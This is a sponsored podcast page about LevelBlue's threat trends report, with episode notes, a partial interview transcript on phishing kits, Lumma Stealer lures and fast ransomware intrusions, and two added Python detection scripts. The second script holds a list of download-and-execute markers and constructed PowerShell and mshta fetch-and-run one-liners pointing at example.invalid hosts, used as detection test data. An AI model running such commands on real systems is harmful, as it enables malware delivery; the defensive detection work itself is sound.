ITSPmagazine Podcasts

From Phishing to Full Compromise in Under an Hour: Automation Is Fueling the Next Wave of Cyber Threats | A LevelBlue Brand Story with Kenneth Ng

Episode Summary

Phishing, malware, and ransomware attacks are becoming faster, easier, and more damaging—and Kenneth Ng from LevelBlue breaks down exactly how and why. This episode reveals the latest threat trends and what organizations can do right now to defend against them.

Episode Notes

LevelBlue’s latest Threat Trends Report pulls no punches: phishing, malware, and ransomware attacks are not just continuing—they’re accelerating. In this episode of ITSPmagazine’s Brand Story podcast, hosts Sean Martin and Marco Ciappelli are joined by Kenneth Ng, a threat hunter and lead incident responder on LevelBlue’s Managed Detection and Response (MDR) team, to unpack the findings and recommendations from the report.

Phishing as a Service and the Surge in Email Compromises

One of the most alarming trends Kenneth highlights is the ready availability of Phishing-as-a-Service (PhaaS) kits such as RaccoonO365, Mamba 2FA, and Greatness. For a credit-card or crypto payment, an attacker with little or no technical skill gets hosted infrastructure and templated lures (a fake invoice, a shared-file notification) and only has to supply a target list. The kits defeat multi-factor authentication (MFA) not by cracking it but by proxying the victim's real Microsoft 365 login: the victim completes MFA against Microsoft's backend, the kit captures the resulting session token, and the attacker replays that token to sign in without ever facing a second-factor prompt. From a single compromised mailbox the attacker can consent to apps that bulk-export mail or SharePoint files, run business email compromise and ACH fraud, and reuse the same credentials against VPN or Entra ID (Azure AD) sign-ins, so a routine-looking Microsoft 365 sign-in can be the first step toward a full enterprise compromise.
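
Because a replayed AiTM token is a successful, MFA-satisfied sign-in, the detection has to key on where the session comes from and what happens next. As an added example (not code from LevelBlue or the report), the following Python correlates constructed, simplified Microsoft 365 audit events: a sign-in from a country the user has never signed in from before, followed within a few hours by a new inbox rule or an application consent. Field names loosely follow the Unified Audit Log but are a simplification, the IP-to-country table is a hypothetical GeoIP stand-in, and every event is made up.

```python
"""Added example (not from the LevelBlue report or this episode): correlate
simplified Microsoft 365 audit events to spot session-token replay after an
adversary-in-the-middle (AiTM) phish.

All events below are CONSTRUCTED. Field names (Operation, UserId, ClientIP,
CreationTime) follow the Unified Audit Log loosely but are a simplification;
IP_COUNTRY is a hypothetical GeoIP stand-in.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical IP -> country lookup standing in for a GeoIP database.
IP_COUNTRY = {
    "203.0.113.10": "US",
    "203.0.113.11": "US",
    "198.51.100.77": "RU",
    "192.0.2.5": "NL",
}

# Actions an attacker commonly takes right after replaying a stolen token:
# a mailbox rule to hide replies, or consent to an app that exports data.
POST_TAKEOVER_OPS = {
    "New-InboxRule",
    "Set-InboxRule",
    "Consent to application.",
    "Add OAuth2PermissionGrant.",
}

# Sign-ins before this point are trusted as the "normal locations" baseline.
LEARN_UNTIL = datetime(2024, 11, 4)

EVENTS = [  # constructed sample data
    {"CreationTime": "2024-10-01T13:02:00", "Operation": "UserLoggedIn", "UserId": "alice@example.com", "ClientIP": "203.0.113.10"},
    {"CreationTime": "2024-10-15T08:45:00", "Operation": "UserLoggedIn", "UserId": "alice@example.com", "ClientIP": "203.0.113.11"},
    {"CreationTime": "2024-10-02T09:00:00", "Operation": "UserLoggedIn", "UserId": "bob@example.com", "ClientIP": "203.0.113.10"},
    {"CreationTime": "2024-10-03T09:00:00", "Operation": "UserLoggedIn", "UserId": "carol@example.com", "ClientIP": "203.0.113.11"},
    # Alice: the kit replays her token from a new country, then hides replies.
    {"CreationTime": "2024-11-04T09:12:00", "Operation": "UserLoggedIn", "UserId": "alice@example.com", "ClientIP": "198.51.100.77"},
    {"CreationTime": "2024-11-04T09:15:00", "Operation": "New-InboxRule", "UserId": "alice@example.com", "ClientIP": "198.51.100.77"},
    # Bob: new country but nothing follows (travel), so no alert.
    {"CreationTime": "2024-11-05T07:30:00", "Operation": "UserLoggedIn", "UserId": "bob@example.com", "ClientIP": "192.0.2.5"},
    # Carol: creates a rule from her usual location, so no alert.
    {"CreationTime": "2024-11-05T10:00:00", "Operation": "UserLoggedIn", "UserId": "carol@example.com", "ClientIP": "203.0.113.11"},
    {"CreationTime": "2024-11-05T10:05:00", "Operation": "New-InboxRule", "UserId": "carol@example.com", "ClientIP": "203.0.113.11"},
]


def _ts(event):
    return datetime.fromisoformat(event["CreationTime"])


def _country(event):
    return IP_COUNTRY.get(event["ClientIP"], "??")


def baseline_countries(events, learn_until):
    """Countries each user signed in from before the learning cutoff."""
    base = defaultdict(set)
    for e in events:
        if e["Operation"] == "UserLoggedIn" and _ts(e) < learn_until:
            base[e["UserId"]].add(_country(e))
    return base


def detect_token_replay(events, learn_until=LEARN_UNTIL, window=timedelta(hours=6)):
    """Flag a sign-in from a never-before-seen country that is followed, within
    `window`, by a post-takeover operation by the same user.

    A replayed AiTM token is a *successful* sign-in with MFA already satisfied,
    so a failed-MFA alert never fires; the observable is the attacker's IP
    plus what they do next.
    """
    base = baseline_countries(events, learn_until)
    by_user = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_user[e["UserId"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        for i, login in enumerate(evs):
            if login["Operation"] != "UserLoggedIn" or _ts(login) < learn_until:
                continue
            country = _country(login)
            if country in base[user]:
                continue  # known location, nothing to do
            for follow in evs[i + 1:]:
                if _ts(follow) - _ts(login) > window:
                    break
                if follow["Operation"] in POST_TAKEOVER_OPS:
                    alerts.append({
                        "user": user,
                        "login_time": login["CreationTime"],
                        "ip": login["ClientIP"],
                        "country": country,
                        "follow_on": follow["Operation"],
                    })
                    break  # one alert per suspicious sign-in
    return alerts


if __name__ == "__main__":
    for a in detect_token_replay(EVENTS):
        print(f"ALERT {a['user']}: sign-in from {a['country']} ({a['ip']}) "
              f"at {a['login_time']} followed by {a['follow_on']}")
```

Run stand-alone it prints one alert, for alice. Bob's new-country sign-in alone is not enough (that is what travel looks like), and Carol's inbox rule from her usual location is normal mailbox hygiene; the pairing is what separates a replayed token from noise. In production the same logic would read sign-in and Exchange/Entra audit events from the SIEM and use a real GeoIP source, and the baseline would be rebuilt on a rolling window rather than a fixed cutoff.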

Malware Is Smarter, Simpler—and It’s Spreading Fast

Malware use is also rising, notably fake browser updates and credential stealers such as Lumma Stealer. In the fake-update campaigns a compromised website runs JavaScript that tells the visitor their Chrome is out of date and hands them a ZIP containing a script file; in the Lumma campaigns a page or document claims the browser is misbehaving or shows a fake "I'm not a robot" check, and its copy button loads PowerShell into the clipboard for the user to paste into a prompt, where it downloads and runs the next stage. Both depend on ordinary user actions, double-clicking a script or pasting text, being allowed to execute code. Kenneth's point is that basic Group Policy controls are still underused: map script extensions such as .js and .wsf to Notepad so they cannot run for end users, and deny standard user accounts access to PowerShell and the command prompt while keeping them available to the administrative accounts that maintain workstations.
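
The Group Policy changes above are the prevention side; detection is what catches the cases where a standard user can still reach a prompt. As an added example (not from the report or the episode), the following Python runs the paste-and-run check over constructed Sysmon-style process-creation events: it flags script hosts whose command line carries download-and-execute markers, records whether the parent was the user's shell (explorer.exe, which is what the Run dialog launches through), and decodes -EncodedCommand payloads before matching so base64 does not hide the one-liner. Field names are simplified, and the example.invalid URLs and lure text are constructed.

```python
"""Added example (not from the LevelBlue report or this episode): flag the
ClickFix / fake-CAPTCHA pattern in process-creation telemetry, where a user
pastes attacker-supplied PowerShell into the Run dialog or a prompt.

The events are CONSTRUCTED and use simplified Sysmon-style field names
(Image, ParentImage, CommandLine, User). URLs use example.invalid.
"""
import base64
import re

# Hosts a pasted one-liner is executed by; explorer.exe as parent means the
# user launched it from the shell (Run dialog / Start menu), not a service.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Substrings typical of a download-and-execute one-liner (lower-cased match).
MARKERS = [
    "iex", "invoke-expression", "irm", "invoke-restmethod", "iwr",
    "invoke-webrequest", "downloadstring", "downloadfile", "http://",
    "https://", "-w hidden", "-windowstyle hidden", "mshta", "curl ",
    "certutil", "bitsadmin", "i am not a robot", "i'm not a robot",
]

# -e / -ec / -enc / -EncodedCommand <base64>; PowerShell accepts any prefix.
ENC_RE = re.compile(r"\s-e[ncodemad]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return an alert dict for a ClickFix-like execution, else None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    haystack = (event["CommandLine"] + " " + (decoded or "")).lower()
    hits = [m for m in MARKERS if m in haystack]
    if not hits:
        return None
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    return {
        "user": event["User"],
        "image": image,
        "from_user_shell": parent == "explorer.exe",
        "decoded": decoded,
        "markers": hits,
    }


def scan(events):
    """Classify every event and keep the ones that produced an alert."""
    return [a for a in (classify(e) for e in events) if a]


# Constructed sample. The lure comment is typical of these campaigns.
_payload = "iex (irm http://example.invalid/stage2.txt)"
_ENC = base64.b64encode(_payload.encode("utf-16-le")).decode()

EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (irm 'https://example.invalid/fix')\" "
                    "# I am not a robot - reCAPTCHA Verification ID: 4912"},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -nop -enc {_ENC}"},
    {"User": "CORP\\carol", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify.hta"},
    # Benign: a scheduled maintenance script launched by a service host.
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\update.ps1"},
    # Benign: a user opens a prompt and lists a directory.
    {"User": "CORP\\dave", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir C:\\Users\\dave"},
]

if __name__ == "__main__":
    for a in scan(EVENTS):
        print(a)
```

Run stand-alone it flags the three pasted one-liners and ignores the service-launched update script and the plain directory listing. The decoded payload is kept in the alert so an analyst sees what the base64 hid; the `from_user_shell` flag is the ClickFix tell, since an administrator's deployment tooling rarely spawns a hidden PowerShell window from explorer.exe. The marker list is deliberately plain substrings and will need tuning for a given fleet.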

Ransomware: Faster and More Automated Than Ever

Ransomware operators are moving far faster. Across the incidents Kenneth has worked recently, breakout time, the gap between initial compromise and lateral movement, has shrunk from days to under an hour, whether entry came by phishing, malware, an exploited VPN or file-transfer appliance in the DMZ, or a fake IT-support call over Microsoft Teams that talks the user into opening the pre-installed Quick Assist. In one case study, once the user ran the file they were sent, everything that followed was scripted: DLL side-loading, privilege escalation, and SMB credential brute-forcing to harvest additional administrator accounts, all within about ten minutes and visible as a clean burst in the SIEM. Attackers then use WinRM or PsExec to push a remote monitoring and management (RMM) tool onto servers and domain controllers, often several RMM tools at once for persistence, and the outbound 443 a domain controller needs for Windows updates is enough to let them back in. That speed leaves defenders little room to react unless detection and prevention, such as blocking unused RMM tools and their domains, application allow-listing, and restricting external Teams domains, are in place beforehand.

Why This Report Matters

Rather than presenting raw data, LevelBlue focuses on actionable insights. Each major finding comes with recommendations that can be implemented regardless of company size or maturity level. The report is a resource not just for LevelBlue customers, but for any organization looking to strengthen its defenses.

Be sure to check out the full conversation and grab the first edition of the Threat Trends Report ahead of LevelBlue’s next release this August—and stay tuned for their updated Futures Report launching at RSA Conference on April 28.

Learn more about LevelBlue: https://itspm.ag/levelblue266f6c

Note: This story contains promotional content.

Guest: Kenneth Ng, threat hunter and lead incident responder on LevelBlue’s Managed Detection and Response (MDR) team | On LinkedIn: https://www.linkedin.com/in/ngkencyber/

Resources

Download the LevelBlue Threat Trends Report | Edition One: https://itspm.ag/levelbyqdp

Learn more and catch more stories from LevelBlue: https://www.itspmagazine.com/directory/levelblue

Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programs

Newsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/

Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-up

Are you interested in telling your story?
https://www.itspmagazine.com/telling-your-story

Episode Transcription


[00:00:00] Sean Martin: Marco, 
 

[00:00:01] Marco Ciappelli: Sean, 
 

[00:00:02] Sean Martin: it's uh, story time. 
 

[00:00:04] Marco Ciappelli: I know it's the, my favorite time of the year. Well, of the day. 'cause at lately we do stories every 
 

[00:00:10] Sean Martin: do many stories all the time, but, uh, they're super fun. And you know what I like about this particular type of story? 
 

[00:00:19] Marco Ciappelli: uh, tell me 
 

[00:00:20] Sean Martin: I'll tell you 'cause you're not gonna be able to guess. Well, I've always wanted to be an analyst, 
 

[00:00:25] Marco Ciappelli: Oh yeah, 
 

[00:00:26] Sean Martin: to be an analyst 'cause I like to 
 

[00:00:27] Marco Ciappelli: you play one on on podcast? 
 

[00:00:30] Sean Martin: I like data, I like to analyze data, I like to look at trends and, and kind of see where things are going. 
 

And 
 

[00:00:35] Marco Ciappelli: You do? 
 

[00:00:37] Sean Martin: that's exactly what we're gonna be talking about today. Uh, the Threat Trends Report from, uh, LevelBlue. So I'm, I'm super fun, excited for this. 
 

[00:00:45] Marco Ciappelli: Very good. And we have Ken that 
 

[00:00:48] Sean Martin: Ken Ng from LevelBlue, uh, who I guess has a, has a bit of a hand in putting this report together. I'd say. 
 

[00:00:57] Kenneth Ng: Yeah, I did. So, hi, [00:01:00] my name is Ken. I'm here with LevelBlue. I'm a threat hunter and one of the lead IR folks on our managed detection and response team. So LevelBlue, we're a managed service provider, managed security service provider. We do cybersecurity consulting, and we also have a threat intelligence team alongside our 24/7/365 SOC. Um. Basically we saw that we had a lot of data from our years of work, uh, from both threat hunting, from all the incidents we help out on, and then obviously, uh, from our SOC and then working hand in hand with our LevelBlue Labs team. And they do kind of threat analysis, threat actor tracking, all the really cool stuff on the backend versus like us being more tactical, boots on the ground. 
 

We just sat down like, Hey, we need to come up with a report. We need to be thought leaders in the field, and we hammered out a first edition of our 2024, second half of the year [00:02:00] report. The Threat Trends Report. 
 

[00:02:03] Sean Martin: So I'm gonna, gonna start here. Um, maybe a little, a little technical, but I think it's interesting 'cause it threat intelligence, threat hunting, security operations, managed detection response. I. Lots of different types of data, right? Some of it looks the same, repetitive others. You're, you're trying to make sense of something that might look, be an anomaly sitting, uh, hidden within another data set. 
 

How, how do you, how do you and the teams look at all of this to kind of figure out what do we collect, how do we normalize it? How do we bring it all together? 
 

[00:02:42] Kenneth Ng: Yeah, I think when we go through our incidents kind of, we start that as our starting point, right? We, we see in many incidents per day. And we drilled down to, Hey, what are the types of incidents we're seeing and how does this align with the findings of the Labs team? [00:03:00] So I think a good example from this of the report is the Labs team started doing a lot of threat actor analysis on phishing as a service kits, in this case, RaccoonO365, and this is just one of many. 
 

This is a drop in a bucket of all the many new phishing as a service kits that we're seeing come up and being our. Is affecting our, our customer base. So we see that as a trend both in our SOC metrics and as threat hunters as we're hunting through, Hey, what phishing as a service kits are we seeing across the theater sources? 
 

What is our SOC seeing, helping customers out with? And how does this align with, uh, what the Labs team is seeing on the dark web and threat actor analysis. So we're taking these pieces of, Hey, what aligns? And in this case, uh, this led to kind of three kind of key points in our, in our report, which is essentially phishing is up, phishing is up big time, and number two is malware is up big time. 
 

And number three, [00:04:00] ransomware actors are working faster and they're getting deeper within environments. 
 

[00:04:05] Marco Ciappelli: So many good news. 
 

[00:04:06] Sean Martin: Right. Loads of good news there. Well, we'll dig into each of those. Um, we, so there's the, the inaugural version of this. Is there an objective beyond just, we have a bunch of data. We're gonna see what it says is, is there an objective to, I guess, how, how do level Blue customers take advantage of, of what you have put together here? 
 

What, 
 

[00:04:35] Kenneth Ng: Yeah, I think it's beyond just, we're not just throwing a whole bunch of numbers and data points. That's not the point of the report, at least in not, uh, the sections I wrote. Uh, we wanted to make sure that there are actionable. Pieces in the report that a customer, or even just anyone else that's not a customer who potentially could be looking for, Hey, what are some recommendations or changes we can make to be more secure, to have more [00:05:00] secure, uh, defense in depth within our organization. 
 

So we made sure for each of those three pieces, those three highlights, that we also have recommendations, Hey, how do we defend against phishing? How do we defend against malware attacks? And in the scope of, uh, ransomware actors, like, how can we. Make the right changes within our environment. How can we detect with the threat actors? 
 

And then when a incident does happen, how do we remove the threat actors, uh, from the environment, the containment and remediation piece. 
 

[00:05:27] Marco Ciappelli: And I wanna add to that, that I, I am already aware and I'm not gonna just spill the beans that you're already planning for a part two. Uh, the, the revenge of the threat report. So obviously it's, it's, it's becoming core for LevelBlue to to be something that you're gonna leverage moving forward and definitely bring benefit to your clients. 
 

[00:05:52] Kenneth Ng: Exactly. We wanna be a thought leader in this space. Uh, we don't wanna simply just have data. We want to help our customers. We wanna help. [00:06:00] All the other vendors and partnerships that we have and potential partners and vendors that wanna work with LevelBlue, we wanna show that hey, we are not afraid to a go in the weeds to discuss in, in this level of detail of what we're seeing, but also how we're detecting how we're helping our customers. 
 

And this just makes the field as a whole stronger and better and more cohesive. 
 

[00:06:22] Marco Ciappelli: All right, so let, let's dig deeper. Start number one. 
 

[00:06:26] Sean Martin: RAC raccoon number 
 

[00:06:28] Kenneth Ng: Uh, yeah, I mean the, the hypo, not the hypothesis, but the thesis statement here is that phishing is up and why is phishing up? Right. Phishing has always been around for, you know, the genesis of cybersecurity, and I think the big finding here is that email account takeover attacks. Are becoming very easy for threat actors to perform. 
 

You have a zero knowledge threat actor who can just simply buy a kit. In this case, in our report, we dis we discussed, uh, [00:07:00] RaccoonO365, but there's also other kits that we've been seeing. Mamba 2FA, uh, Tycoon, Greatness. Uh, all these are re readily available. Cheap. All you need to do is just give them a credit card, some crypto, boom. 
 

You have the backend infrastructure, you have the phishing kit itself. You just put in the targets, you click send. It creates the emails. It sends the emails to your victims. And from there, uh, these kits are relatively simple, right? You have a fake invoice. You have a fake, Hey, we just shared this. Follow with you. 
 

We're seeing. You know, previously everyone's talking about 2FA for protections against these account takeover accounts, um, attacks from phishing. And the problem is all these kits now incorporate a 2FA proxy where it proxies your connection to the Microsoft backend. You put in your MFA credentials and you get a. 
 

Session token, that the attacker gets a session token, and then the attacker [00:08:00] then uses the th uh, session token to get into your environment. So 
 

[00:08:04] Sean Martin: you're, you're not actually, your session token is not actually being used by you. You are handing it off to the, 
 

[00:08:10] Kenneth Ng: You're handing it off to the attacker and then they're using it to get into your environment. And there's also a lot of, I guess, gaps in security, what we see across both customers and what's being discussed, uh, by other vendors. Right. Um, a big good example is app consent. You know, as an end user. You're able to consent to apps to be added to your O365 account. 
 

So we're seeing threat actors leverage apps that let you very quickly exfil out your entire mailbox or to jump into SharePoint and pull out, uh, as many files as they want, right outta SharePoint. So then this becomes a problem because. It's downstream attacks, not that you're, you're worried about. This is where email account takeover accounts attacks, sorry, lead to business email compromise. 
 

And this is where you have ACH scams. Uh, this is where you have [00:09:00] downstream attacks where your 365 credentials or your Azure AD credentials that come in for the VPN. So now you're not just looking at a phishing attack that led to a email compromise. You're, you're looking at a phishing attack that led to potentially full, uh. 
 

Enterprise compromise through a ransomware actor. 
 

[00:09:19] Sean Martin: Uh, so, so many questions on this first point because obviously there's, there's the entry into, into the organization through a system or a device or, uh, an end user clicking on something. And there's, uh, the detection of that. And then there's the other stuff you're talking about, which is now the, the, uh, the. 
 

There's a compromise, right? And lateral movement and, and installation of additional things can take place. Are there signs of those activities that can be identified and used to block [00:10:00] and if not, how do, how do organizations how, with the after effect of a compromise, if it, if that is indeed successful in terms of like response and recovery and things like that? 
 

[00:10:12] Kenneth Ng: Sure. That's a, a very multifaceted question, Sean, but 
 

[00:10:16] Sean Martin: I like to do that, by the way. 
 

[00:10:17] Kenneth Ng: we're hitting many different pieces of it. Right. Just talking about the phishing aspect. Right. Uh, the first piece of that is the a have a strong email gateway. Right. That was. Filter out a lot of the fil phishing emails that come in. Kind of stop the attack before you even get to the downstream. 
 

Uh, user compromise. Um. It's talking about having good conditional access within your O365. It's talking about the app consent, um, having only admins allow for consent consenting of apps. It's talking about having the logs come to a SIEM, right? So that, you know, organizations such as LevelBlue can then analyze and say, Hey, we have these. 
 

We have the telemetry, we [00:11:00] have the rules that detect, uh, the attacker activity. Um, very common attacker activity when they enter a mailbox is to create a mailbox rule, right? So it's how do you have the logs to even detect that in the first place? Do you have the teams to do that? So that's the first piece of it. 
 

Second piece of it is, do you have someone looking at the logins, right? So you have a suspicious or anomalous login from most likely a IP address that's not from your normal users. So do you have the tools to detect those anomalies? You know, whether that be machine learning or just hard TTPs. Analysis of, hey, this usually usually comes in from an American IP address and all of a sudden we're seeing a Russian IP address. 
 

So that's sort of the, the first piece of the puzzle. That phishing, assuming that's the, you know, first intrusion method. And we referenced this as a report, but phishing is just one small piece of the intrusion puzzle. Right. We also have. The discussion of malware with the discussion of [00:12:00] exploitation of devices in the DMZ. 
 

You know, most of the time this is, uh, the VPN concentrator, this is the, uh, firewall entry point. Or this could even be a FTP, um, box that's readily accessible. And we saw that recently with CrushFTP, so Really? Oh, sure. Mark 
 

[00:12:17] Marco Ciappelli: no, no. I, I was thinking like, when, when you gave the three main point and, you know, you gave the, the good news, malware, ransomware, and, and phishing, they're all up and I'm thinking like they're probably the same reason, right? I mean, automation, uh, malware as a service and, and, and, and all of that. And, and it is kinda like more of deciding, Hmm, which. 
 

Which tool am I gonna get in this nice bag that I can purchase, even if I don't know anything about hacking? 
 

[00:12:48] Kenneth Ng: right. And it's, it's kinda unfortunate, right? There's no one tool that captures. All of these, right? Both the phishing piece, the the ransomware piece or ext stringently, the. [00:13:00] The malware piece and it's about having the right partnerships and vendors in place. So, you know, speaking as a LevelBlue employee, obviously we do that full suite, we do partnerships with SentinelOne for EDR, we do the email analysis. 
 

We have our 24/7 SOC. But speaking as a security practitioner, generally you wanna choose a vendor and a partner that aligns with business needs and budget and all of that. 
 

[00:13:25] Sean Martin: And one, one thing, Ken, if I can, because. When we, when we look at response in particular, um, it, it's often the time between compromise and recovery, right? Or at least blocking or, um, yeah, stopping the, stopping the spread, and then ultimately recovery. Um, it sounds like the, the bad actors are. Orchestrating using these tools, a lot of the tactics and techniques and automating a lot of that stuff. 
 

So those times are just super fast now, making it even more [00:14:00] difficult for response teams to, to, to close that gap of, of compromise to damage. Um, is that the case? Are there data points supporting that? And, and how do organizations kind of handle that scenario? 
 

[00:14:15] Kenneth Ng: Yeah, so across the ransomware incidents I've worked in the last couple of months we're seeing breakout time. So from time of compromise to lateral movement that used to be within days, we're now seeing that within an hour. So sub one hour intrusion, you know, whether through what we discussed, through phishing, through malware, through exploiting the DMZ. Or through, uh, what we often see is the fake IT support, where they call in, get a user on Teams, and then they'll use, Hey, open Quick Assist, which is pre-installed on all your hosts from that intrusion point. It's sub one hour to laterally move, and nine times outta 10, they're moving on to a server that. 
 

Usually [00:15:00] contains other admin administrative credentials, and that leads to full domain pop. So threat actors are doing this very quickly, right? They're using some level of scripting automation. Uh, they run their scripts. Uh, and in the case of one case study we've done, the customer, they had a user fall for the tech support scam user opened the file that was sent to them through the app. From there, everything was automated from both the execution, the DLL side loading that allowed for the escalation of privileges on the DLL and then the brute forcing and SMB uh, attacks to get additional administrator credentials. So all that. We saw within 10, 10 minutes tops with scripts that didn't have any mistakes. 
 

It was just blast, blast, blast. And we see this in our SIEM so we know that piece of it is definitely automated and scripted. Um, they have it down to a T And really the defensive measures [00:16:00] there is a, to not have your users fall for phishing, not have your users fall for the Microsoft Teams attacks, right? 
 

So that's where you have to really figure out your threat surface, right? If you're using Microsoft Teams. Do you have external domains able to reach in? Right? Do you, or do you have a whitelist approach that only allows trusted domains to come in? If, uh, your major intrusion point is users running malware, downloading software? 
 

Do, are you using, uh, whitelisting of applications? Are you using tools like AppLocker to not allow certain executions of files? Right. Threat actors often rely on the same con of files across our attacks. Um, this is reconnaissance tools like NetScan, uh, Angry IP Scanner. We see them use the same kind of tools for. Enumeration, right? So does the end user need access to these tools and nine times outta 10 it's no, it's, it's your admin users that really [00:17:00] need these tools. Another example is RMM tools. Well, you're likely just gonna be using one RMM, so remote management and. Monitoring tool. So this could be your ScreenConnect, this could be your TeamViewer. 
 

Well, threat actors are dropping 2, 3, 4 RMM tools to keep persistence on your servers, on your end user workstations that they pop. And this is another case where, hey, you can preemptively block those RMM tools and their API endpoints, so the domains that they need access to, to act for the program to actually run. 
 

So by taking that preemptive step. You're making it much difficult, much more difficult for a threat actor to do their job of A compromising users, but b, laterally moving across the environment and I guess 
 

[00:17:44] Sean Martin: they're, they're automating the reconnaissance and then using the results of that to, 
 

[00:17:49] Kenneth Ng: yeah, and that piece. 
 

[00:17:50] Sean Martin: the actions and the movement itself. Yeah. 
 

[00:17:53] Kenneth Ng: itself is a a bit manual, right? You need to be able to, Hey, I now have these creds to then do this on the domain [00:18:00] controller. But a lot of the spread we do see, hey, this could be scripted, right? They're just using WinRM. They're using PsExec to just beam an installer. 
 

Nine times. Like I said, it's the RMM tool. You beam it on the domain controller. Now you have a remote desktop tool on your domain controller and your domain controller. Even if for the most part you have the network controls pretty down pat, you allow 443 out, it needs to pull Windows updates, right? Bam. 
 

That's all it needs to for them to get back in on that remote access tool on your domain controller. 
 

[00:18:32] Sean Martin: There goes 
 

[00:18:32] Marco Ciappelli: the situation in like, I, I'm always fascinated by, you know, the, the, the never ending fight between good and evil, right? So something in innovates on the defense side, something innovates on the offensive side and so on. So in, in this scenario. Um, there is a lot that can be done, um, preventing this from happening, but do we have [00:19:00] technologies that are fighting automatically without the auto, against the automation of the attacker? 
 

[00:19:10] Kenneth Ng: That's a good question. It's uh, it's not something I have seen. I know it's something our LevelBlue Labs team is kind of working on using, you know, generative AI and machine learning to better detect that activity. That's something we are trying to get ahead of, but I think just speaking as a practitioner, just speaking as myself, it's, it's a tough fight. 
 

[00:19:32] Marco Ciappelli: Right. Yeah. 
 

[00:19:34] Sean Martin: And. In terms of, of, uh, malware. 'cause that's kind of the second, second block of stuff. We've, we've kind of talked in and around us, but, uh, any highlights from, from there that you want to point to? And what do, what does some of those results mean to organizations trying to defend themselves? 
 

[00:19:57] Kenneth Ng: Yeah, sure. So on our 2024, which is [00:20:00] what the trends report, uh, covered, we saw a lot of Cobalt Strike. And that's a given, that's a very readily available tool for threat actors. But I think for me, more interesting was the uptick in both fake updates. Uh, this is where you usually visit a compromise site. It runs some JavaScript. 
 

It says, Hey, you're running an out of date Chrome. Please download this file, and you're gonna, users, end users end up downloading a zip file, and inside that is a JavaScript file. Uh, I think this comes down to poor control, uh, and GPO where you're just letting willy-nilly users double click on executable script files and it just runs for end users. 
 

Uh, the best defense against this is to use GPO to set Hey. WSF files, JavaScript files, files that end users have no business running. Have that open a Notepad, makes it completely useless as a threat vector. And the second attack, we're seeing a lot of, um, it's Lumma Stealer, it's also referenced in the [00:21:00] report, but just in the last week we had seven Lumma uh, detections. 
 

And this is where you'll visit a website or you'll open a document and it says, Hey. Your browser does is wonky. Please copy and paste this code. So, and the website, you click the copy button, uh, it uses JavaScript to put stuff into your clipboard. You paste it, it says, all we're doing is it. All it does is I'm a human. Really, you copied a bunch of PowerShell that's now gonna pull down, you know, additional files plus the cute little, I'm not a robot, so we've seen seven of these in the past week. Users are prone to fall for it, right? It's, it looks like it could be a CAPTCHA. It looks as a, as pictures to it. It looks fancy, it sounds legit. 
 

Um, and I think. This one is easy enough. You just don't allow users to run PowerShell unless they're a power user. Um, don't let them open command prompt. You know, you still need command [00:22:00] prompt on the backend to run, you know, updates and controls for your user workstations, but at the end, users themselves, under their account should not be able to open a command, prompt paste in commands, and then get compromised in that way. 
 

So that, that's a really good finding. We've had, uh, both last year and this year. 
 

[00:22:17] Sean Martin: So for, for Group Policy, you've mentioned this a few times, GPO Group policy orchestrator, that is, that something organizations aren't using. I'll say well enough or effectively enough. 
 

[00:22:33] Kenneth Ng: Um, I would say 
 

[00:22:35] Sean Martin: seems like a tool that, that, that exists in the environment that maybe just a bit of understanding of how your, what your policies are and being a little more prescriptive and, and how you control things might be 
 

[00:22:46] Kenneth Ng: there's a level of complexity there, right? I feel like if everyone had the mindset of, oh, I'm gonna leverage GPO to protect my organization, we wouldn't have as many compromises. I'm not throwing customers [00:23:00] or organizations that been compromised on the 
 

[00:23:01] Sean Martin: of course not. 
 

[00:23:02] Kenneth Ng: bus, right? Like there's. The, the threat actors are getting better, they're having more novel techniques that, which means as defenders we need to go in and make these prescriptions of, Hey, go into your GPO and do this, or you need to enable these kind of rules in your EDR. 
 

Um, the malware's easier to use for the threat actor. It's easier to compromise systems. There's more zero day exploits, right? But at the same time, I think there's what I call the three A's, uh, in. Cybersecurity orgs, and that's apathy, apprehension, and acquiescence. So you have this apprehension to make these changes, right? 
 

You don't want to take down the system, you don't want to make those patches, right? That could take down the business. You have a bit of apathy and that, hey, we haven't been compromised yet. Maybe we're already doing the right things. When we see a, a good example is when we see A DMZ compromise. Usually you're thinking zero day, you're thinking, I'm running the latest [00:24:00] version. 
 

I got popped by a zero day, no, nine times outta 10. You go in, oh, you're running a version That's a year behind. Right. It happens to have been a zero day, but it impacts, you know, many versions back. And I think that acquiescence piece is really, everyone thinks they're gonna get popped and what's the worst that can happen if you get popped, if you have cyber insurance? 
 

